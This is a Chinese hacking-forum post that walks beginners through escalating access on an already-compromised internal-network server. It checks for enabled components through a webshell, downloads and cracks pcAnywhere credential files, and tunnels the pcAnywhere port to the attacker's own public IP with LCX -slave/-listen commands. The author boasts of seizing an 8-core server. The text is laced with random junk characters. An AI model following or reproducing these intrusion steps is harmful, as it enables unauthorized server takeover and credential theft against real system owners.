|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。7 o* m8 ? _4 a! ]) G
}+ @. d% Q" {8 r& A, b
提权方法:pcanywhere+LCX0 C& d0 S- I9 S4 N- V( J; ?
4 _- P3 Q, ], u' \% ]
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
) \% W7 _2 d% P! h. c* t6 d1 m' _# w) F0 t6 m. Z
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
+ U& m# w( ^% c; ]' d* n2 E
7 x7 L5 i$ ~' Y4 d4 w
& ]1 w! ^. t$ @/ x5 W查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
2 `. ] l, n. w0 @& w. j- }
% G" e b3 r2 B) X
& C# X! i4 @: E* J% F- k# b呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。; y1 b6 I( [. J9 N% O
% F/ `# B u, s8 g. `; ]. v' k& ^ F5 Y: \: I& a* G
+ j2 i, t+ `) ?8 ^" t
' l% L$ ]3 m' I* ]. R' o2 {由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
) B( r @' U* X0 T6 z1 E* i( W. [5 I; U) U* F# G/ y u. b9 @( U% X
/ N2 [ @* n% g! i
LCX的用法再简单说下:
# U7 ]) N' w2 M' {' v- w
0 ^0 x. x9 W/ U& o& J+ u服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)& Y4 e# j, b( l6 X! T5 ^2 ~( f
3 i& [, C, G: E本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)1 k5 U* F, x. P. u( @" a
/ u7 o/ n% d3 j; v5 G: ^% z. Z由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。( [6 t4 I# m3 ~# ^
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
& Y2 s5 G# _4 \2 Z$ Z& ]7 y& C) u+ x
6 A) [& K2 R* w& Y* J3 \
; {9 ]3 x Q2 h- O$ u
" M: `1 L- O/ ]1 u8 |" Q' Q; ^
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。4 u) t7 o& }& j3 c. c5 E0 y
) a4 O( J: G" M4 p
8 t# V. O! y C$ B U& \4 {2 s
3 c7 R" v% w4 @( W
5 z X0 L/ d# y- l" I7 F我们本地连接试试,输入我们刚破解的账号密码, U7 f6 q3 B* U$ u" v. }, c
8 U* ~* b! k o$ ~' a8 m6 T& }' i) w1 ~8 d b$ {
呵呵``连接成功,服务器不错,又一个8核^︵^( z# Z. e. t( M# Z ?
( [. n$ k4 H- U+ v0 l, d2 K# k- Y- u
" O( C% z$ Y2 m) ~% } |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
